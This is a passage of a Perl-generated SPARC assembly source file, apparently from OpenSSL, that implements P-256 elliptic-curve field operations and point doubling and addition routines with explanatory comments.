subc %g0,%g0,$carry ! broadcast carry bit
.size __ecp_nistz256_mul_by_3,.-__ecp_nistz256_mul_by_3
! void ecp_nistz256_sub(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_sub
.align 32
ecp_nistz256_sub:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_sub_from
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_sub,.-ecp_nistz256_sub
! void ecp_nistz256_neg(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_neg
.align 32
ecp_nistz256_neg:
save %sp,-STACK_FRAME,%sp
mov $ap,$bp
mov 0,@acc[0]
mov 0,@acc[1]
mov 0,@acc[2]
mov 0,@acc[3]
mov 0,@acc[4]
mov 0,@acc[5]
mov 0,@acc[6]
call __ecp_nistz256_sub_from
mov 0,@acc[7]
ret
restore
.size ecp_nistz256_neg,.-ecp_nistz256_neg
.align 32
__ecp_nistz256_sub_from:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
subcc @acc[0],$t0,@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
subccc @acc[1],$t1,@acc[1]
subccc @acc[2],$t2,@acc[2]
ld [$bp+24],$t6
ld [$bp+28],$t7
subccc @acc[3],$t3,@acc[3]
subccc @acc[4],$t4,@acc[4]
subccc @acc[5],$t5,@acc[5]
subccc @acc[6],$t6,@acc[6]
subccc @acc[7],$t7,@acc[7]
subc %g0,%g0,$carry ! broadcast borrow bit
.Lreduce_by_add:
! if a-b borrows, add modulus.
!
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
addcc @acc[0],$carry,@acc[0] ! add synthesized modulus
addccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
addccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
addccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
addccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
addccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
addccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
addc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_sub_from,.-__ecp_nistz256_sub_from
.align 32
__ecp_nistz256_sub_morf:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
subcc $t0,@acc[0],@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
subccc $t1,@acc[1],@acc[1]
subccc $t2,@acc[2],@acc[2]
ld [$bp+24],$t6
ld [$bp+28],$t7
subccc $t3,@acc[3],@acc[3]
subccc $t4,@acc[4],@acc[4]
subccc $t5,@acc[5],@acc[5]
subccc $t6,@acc[6],@acc[6]
subccc $t7,@acc[7],@acc[7]
b .Lreduce_by_add
subc %g0,%g0,$carry ! broadcast borrow bit
.size __ecp_nistz256_sub_morf,.-__ecp_nistz256_sub_morf
! void ecp_nistz256_div_by_2(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_div_by_2
.align 32
ecp_nistz256_div_by_2:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_div_by_2
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_div_by_2,.-ecp_nistz256_div_by_2
.align 32
__ecp_nistz256_div_by_2:
! ret = (a is odd ? a+mod : a) >> 1
and @acc[0],1,$bi
neg $bi,$carry
addcc @acc[0],$carry,@acc[0]
addccc @acc[1],$carry,@acc[1]
addccc @acc[2],$carry,@acc[2]
addccc @acc[3],0,@acc[3]
addccc @acc[4],0,@acc[4]
addccc @acc[5],0,@acc[5]
addccc @acc[6],$bi,@acc[6]
addccc @acc[7],$carry,@acc[7]
addc %g0,%g0,$carry
! ret >>= 1
srl @acc[0],1,@acc[0]
sll @acc[1],31,$t0
srl @acc[1],1,@acc[1]
or @acc[0],$t0,@acc[0]
sll @acc[2],31,$t1
srl @acc[2],1,@acc[2]
or @acc[1],$t1,@acc[1]
sll @acc[3],31,$t2
st @acc[0],[$rp]
srl @acc[3],1,@acc[3]
or @acc[2],$t2,@acc[2]
sll @acc[4],31,$t3
st @acc[1],[$rp+4]
srl @acc[4],1,@acc[4]
or @acc[3],$t3,@acc[3]
sll @acc[5],31,$t4
st @acc[2],[$rp+8]
srl @acc[5],1,@acc[5]
or @acc[4],$t4,@acc[4]
sll @acc[6],31,$t5
st @acc[3],[$rp+12]
srl @acc[6],1,@acc[6]
or @acc[5],$t5,@acc[5]
sll @acc[7],31,$t6
st @acc[4],[$rp+16]
srl @acc[7],1,@acc[7]
or @acc[6],$t6,@acc[6]
sll $carry,31,$t7
st @acc[5],[$rp+20]
or @acc[7],$t7,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_div_by_2,.-__ecp_nistz256_div_by_2
___
########################################################################
# following subroutines are "literal" implementation of those found in
# ecp_nistz256.c
#
########################################################################
# void ecp_nistz256_point_double(P256_POINT *out,const P256_POINT *inp);
#
{
my ($S,$M,$Zsqr,$tmp0)=map(32*$_,(0..3));
# above map() describes stack layout with 4 temporary
# 256-bit vectors on top.
$code.=<<___;
#ifdef __PIC__
SPARC_PIC_THUNK(%g1)
#endif
.globl ecp_nistz256_point_double
.align 32
ecp_nistz256_point_double:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_double_vis3
nop
save %sp,-STACK_FRAME-32*4,%sp
mov $rp,$rp_real
mov $ap,$ap_real
.Lpoint_double_shortcut:
ld [$ap+32],@acc[0]
ld [$ap+32+4],@acc[1]
ld [$ap+32+8],@acc[2]
ld [$ap+32+12],@acc[3]
ld [$ap+32+16],@acc[4]
ld [$ap+32+20],@acc[5]
ld [$ap+32+24],@acc[6]
ld [$ap+32+28],@acc[7]
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(S, in_y);
add %sp,LOCALS+$S,$rp
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Zsqr, in_z);
add %sp,LOCALS+$Zsqr,$rp
add $ap_real,0,$bp
call __ecp_nistz256_add ! p256_add(M, Zsqr, in_x);
add %sp,LOCALS+$M,$rp
add %sp,LOCALS+$S,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(S, S);
add %sp,LOCALS+$S,$rp
ld [$ap_real],@acc[0]
add %sp,LOCALS+$Zsqr,$bp
ld [$ap_real+4],@acc[1]
ld [$ap_real+8],@acc[2]
ld [$ap_real+12],@acc[3]
ld [$ap_real+16],@acc[4]
ld [$ap_real+20],@acc[5]
ld [$ap_real+24],@acc[6]
ld [$ap_real+28],@acc[7]
call __ecp_nistz256_sub_from ! p256_sub(Zsqr, in_x, Zsqr);
add %sp,LOCALS+$Zsqr,$rp
add $ap_real,32,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(tmp0, in_z, in_y);
add %sp,LOCALS+$tmp0,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(res_z, tmp0);
add $rp_real,64,$rp
add %sp,LOCALS+$Zsqr,$bp
add %sp,LOCALS+$M,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(M, M, Zsqr);
add %sp,LOCALS+$M,$rp
call __ecp_nistz256_mul_by_3 ! p256_mul_by_3(M, M);
add %sp,LOCALS+$M,$rp
add %sp,LOCALS+$S,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(tmp0, S);
add %sp,LOCALS+$tmp0,$rp
call __ecp_nistz256_div_by_2 ! p256_div_by_2(res_y, tmp0);
add $rp_real,32,$rp
add $ap_real,0,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S, S, in_x);
add %sp,LOCALS+$S,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(tmp0, S);
add %sp,LOCALS+$tmp0,$rp
add %sp,LOCALS+$M,$bp
add %sp,LOCALS+$M,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(res_x, M);
add $rp_real,0,$rp
add %sp,LOCALS+$tmp0,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, tmp0);
add $rp_real,0,$rp
add %sp,LOCALS+$S,$bp
call __ecp_nistz256_sub_morf ! p256_sub(S, S, res_x);
add %sp,LOCALS+$S,$rp
add %sp,LOCALS+$M,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S, S, M);
add %sp,LOCALS+$S,$rp
add $rp_real,32,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, S, res_y);
add $rp_real,32,$rp
ret
restore
.size ecp_nistz256_point_double,.-ecp_nistz256_point_double
___
}
########################################################################
# void ecp_nistz256_point_add(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT *in2);
{
my ($res_x,$res_y,$res_z,
$H,$Hsqr,$R,$Rsqr,$Hcub,
$U1,$U2,$S1,$S2)=map(32*$_,(0..11));
my ($Z1sqr, $Z2sqr) = ($Hsqr, $Rsqr);
# above map() describes stack layout with 12 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty, result of check for zero and return pointer.
my $bp_real=$rp_real;
$code.=<<___;
.globl ecp_nistz256_point_add
.align 32
ecp_nistz256_point_add:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_add_vis3
nop
save %sp,-STACK_FRAME-32*12-32,%sp
stx $rp,[%fp+STACK_BIAS-8] ! off-load $rp
mov $ap,$ap_real
mov $bp,$bp_real
ld [$bp],@acc[0] ! in2_x
ld [$bp+4],@acc[1]
ld [$bp+8],@acc[2]
ld [$bp+12],@acc[3]
ld [$bp+16],@acc[4]
ld [$bp+20],@acc[5]
ld [$bp+24],@acc[6]
ld [$bp+28],@acc[7]
ld [$bp+32],$t0 ! in2_y
ld [$bp+32+4],$t1
ld [$bp+32+8],$t2
ld [$bp+32+12],$t3
ld [$bp+32+16],$t4
ld [$bp+32+20],$t5
ld [$bp+32+24],$t6
ld [$bp+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in2infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-12]
ld [$ap],@acc[0] ! in1_x
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
ld [$ap+28],@acc[7]
ld [$ap+32],$t0 ! in1_y
ld [$ap+32+4],$t1
ld [$ap+32+8],$t2
ld [$ap+32+12],$t3
ld [$ap+32+16],$t4
ld [$ap+32+20],$t5
ld [$ap+32+24],$t6
ld [$ap+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in1infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-16]
add $bp_real,64,$bp
add $bp_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z2sqr, in2_z);
add %sp,LOCALS+$Z2sqr,$rp
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS+$Z1sqr,$rp
add $bp_real,64,$bp
add %sp,LOCALS+$Z2sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S1, Z2sqr, in2_z);
add %sp,LOCALS+$S1,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS+$S2,$rp
add $ap_real,32,$bp
add %sp,LOCALS+$S1,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S1, S1, in1_y);
add %sp,LOCALS+$S1,$rp
add $bp_real,32,$bp
add %sp,LOCALS+$S2,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$S1,$bp
call __ecp_nistz256_sub_from ! p256_sub(R, S2, S1);
add %sp,LOCALS+$R,$rp
or @acc[1],@acc[0],@acc[0] ! see if result is zero
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
st @acc[0],[%fp+STACK_BIAS-20]
add $ap_real,0,$bp
add %sp,LOCALS+$Z2sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U1, in1_x, Z2sqr);
add %sp,LOCALS+$U1,$rp
add $bp_real,0,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, in2_x, Z1sqr);
add %sp,LOCALS+$U2,$rp
add %sp,LOCALS+$U1,$bp
call __ecp_nistz256_sub_from ! p256_sub(H, U2, U1);
add %sp,LOCALS+$H,$rp
or @acc[1],@acc[0],@acc[0] ! see if result is zero
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
orcc @acc[4],@acc[0],@acc[0]
bne,pt %icc,.Ladd_proceed ! is_equal(U1,U2)?
nop
ld [%fp+STACK_BIAS-12],$t0
ld [%fp+STACK_BIAS-16],$t1
ld [%fp+STACK_BIAS-20],$t2
andcc $t0,$t1,%g0
be,pt %icc,.Ladd_proceed ! (in1infty || in2infty)?
nop
andcc $t2,$t2,%g0
be,pt %icc,.Ladd_double ! is_equal(S1,S2)?
nop
ldx [%fp+STACK_BIAS-8],$rp
st %g0,[$rp]
st %g0,[$rp+4]
st %g0,[$rp+8]
st %g0,[$rp+12]
st %g0,[$rp+16]
st %g0,[$rp+20]
st %g0,[$rp+24]
st %g0,[$rp+28]
st %g0,[$rp+32]
st %g0,[$rp+32+4]
st %g0,[$rp+32+8]
st %g0,[$rp+32+12]
st %g0,[$rp+32+16]
st %g0,[$rp+32+20]
st %g0,[$rp+32+24]
st %g0,[$rp+32+28]
st %g0,[$rp+64]
st %g0,[$rp+64+4]
st %g0,[$rp+64+8]
st %g0,[$rp+64+12]
st %g0,[$rp+64+16]
st %g0,[$rp+64+20]
st %g0,[$rp+64+24]
st %g0,[$rp+64+28]
b .Ladd_done
nop
.align 16
.Ladd_double:
ldx [%fp+STACK_BIAS-8],$rp_real
mov $ap_real,$ap
b .Lpoint_double_shortcut
add %sp,32*(12-4)+32,%sp ! difference in frame sizes
.align 16
.Ladd_proceed:
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$R,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS+$Rsqr,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS+$res_z,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS+$Hsqr,$rp
add $bp_real,64,$bp
add %sp,LOCALS+$res_z,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, res_z, in2_z);
add %sp,LOCALS+$res_z,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS+$Hcub,$rp
add %sp,LOCALS+$U1,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, U1, Hsqr);
add %sp,LOCALS+$U2,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$Rsqr,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$Hcub,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$U2,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$Hcub,$bp
add %sp,LOCALS+$S1,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S1, Hcub);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$res_y,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$S2,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS+$res_y,$rp
ld [%fp+STACK_BIAS-16],$t1 ! !in1infty
ld [%fp+STACK_BIAS-12],$t2 ! !in2infty
ldx [%fp+STACK_BIAS-8],$rp
___
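# The conditional moves below select the final output branchlessly:
# the freshly computed result by default, in2 if in1 was the point at
# infinity, and in1 if in2 was, using the all-ones/all-zeros
# !in1infty and !in2infty masks computed above.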
for($i=0;$i<96;$i+=8) { # conditional moves
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$bp_real+$i],@acc[2] ! in2
ld [$bp_real+$i+4],@acc[3]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@acc[2],@acc[0]
movrz $t1,@acc[3],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
$code.=<<___;
.Ladd_done:
ret
restore
.size ecp_nistz256_point_add,.-ecp_nistz256_point_add
___
}
########################################################################
# void ecp_nistz256_point_add_affine(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT_AFFINE *in2);
{
my ($res_x,$res_y,$res_z,
$U2,$S2,$H,$R,$Hsqr,$Hcub,$Rsqr)=map(32*$_,(0..9));
my $Z1sqr = $S2;
# above map() describes stack layout with 10 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty, result of check for zero and return pointer.
my @ONE_mont=(1,0,0,-1,-1,-1,-2,0);
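# @ONE_mont is 1 in Montgomery representation, i.e. 2^256 mod P =
# 2^224 - 2^192 - 2^96 + 1, written as eight 32-bit words with -1/-2
# shorthand for 0xffffffff/0xfffffffe.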
my $bp_real=$rp_real;
$code.=<<___;
.globl ecp_nistz256_point_add_affine
.align 32
ecp_nistz256_point_add_affine:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_add_affine_vis3
nop
save %sp,-STACK_FRAME-32*10-32,%sp
stx $rp,[%fp+STACK_BIAS-8] ! off-load $rp
mov $ap,$ap_real
mov $bp,$bp_real
ld [$ap],@acc[0] ! in1_x
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
ld [$ap+28],@acc[7]
ld [$ap+32],$t0 ! in1_y
ld [$ap+32+4],$t1
ld [$ap+32+8],$t2
ld [$ap+32+12],$t3
ld [$ap+32+16],$t4
ld [$ap+32+20],$t5
ld [$ap+32+24],$t6
ld [$ap+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in1infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-16]
ld [$bp],@acc[0] ! in2_x
ld [$bp+4],@acc[1]
ld [$bp+8],@acc[2]
ld [$bp+12],@acc[3]
ld [$bp+16],@acc[4]
ld [$bp+20],@acc[5]
ld [$bp+24],@acc[6]
ld [$bp+28],@acc[7]
ld [$bp+32],$t0 ! in2_y
ld [$bp+32+4],$t1
ld [$bp+32+8],$t2
ld [$bp+32+12],$t3
ld [$bp+32+16],$t4
ld [$bp+32+20],$t5
ld [$bp+32+24],$t6
ld [$bp+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in2infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-12]
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS+$Z1sqr,$rp
add $bp_real,0,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, Z1sqr, in2_x);
add %sp,LOCALS+$U2,$rp
add $ap_real,0,$bp
call __ecp_nistz256_sub_from ! p256_sub(H, U2, in1_x);
add %sp,LOCALS+$H,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS+$S2,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS+$res_z,$rp
add $bp_real,32,$bp
add %sp,LOCALS+$S2,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS+$S2,$rp
add $ap_real,32,$bp
call __ecp_nistz256_sub_from ! p256_sub(R, S2, in1_y);
add %sp,LOCALS+$R,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$R,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS+$Rsqr,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS+$Hcub,$rp
add $ap_real,0,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, in1_x, Hsqr);
add %sp,LOCALS+$U2,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$Rsqr,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$Hcub,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$U2,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS+$res_y,$rp
add $ap_real,32,$bp
add %sp,LOCALS+$Hcub,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, in1_y, Hcub);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$res_y,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$S2,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS+$res_y,$rp
ld [%fp+STACK_BIAS-16],$t1 ! !in1infty
ld [%fp+STACK_BIAS-12],$t2 ! !in2infty
ldx [%fp+STACK_BIAS-8],$rp
___
for($i=0;$i<64;$i+=8) { # conditional moves
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$bp_real+$i],@acc[2] ! in2
ld [$bp_real+$i+4],@acc[3]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@acc[2],@acc[0]
movrz $t1,@acc[3],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
for(;$i<96;$i+=8) {
my $j=($i-64)/4;
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@ONE_mont[$j],@acc[0]
movrz $t1,@ONE_mont[$j+1],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
$code.=<<___;
ret
restore
.size ecp_nistz256_point_add_affine,.-ecp_nistz256_point_add_affine
___
} }}}
{{{
my ($out,$inp,$index)=map("%i$_",(0..2));
my $mask="%o0";
$code.=<<___;
! void ecp_nistz256_scatter_w5(void *%i0,const P256_POINT *%i1,
! int %i2);
.globl ecp_nistz256_scatter_w5
.align 32
ecp_nistz256_scatter_w5:
save %sp,-STACK_FRAME,%sp
sll $index,2,$index
add $out,$index,$out
ld [$inp],%l0 ! X
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
add $inp,32,$inp
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
add $out,64*8,$out
ld [$inp],%l0 ! Y
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
add $inp,32,$inp
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
add $out,64*8,$out
ld [$inp],%l0 ! Z
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
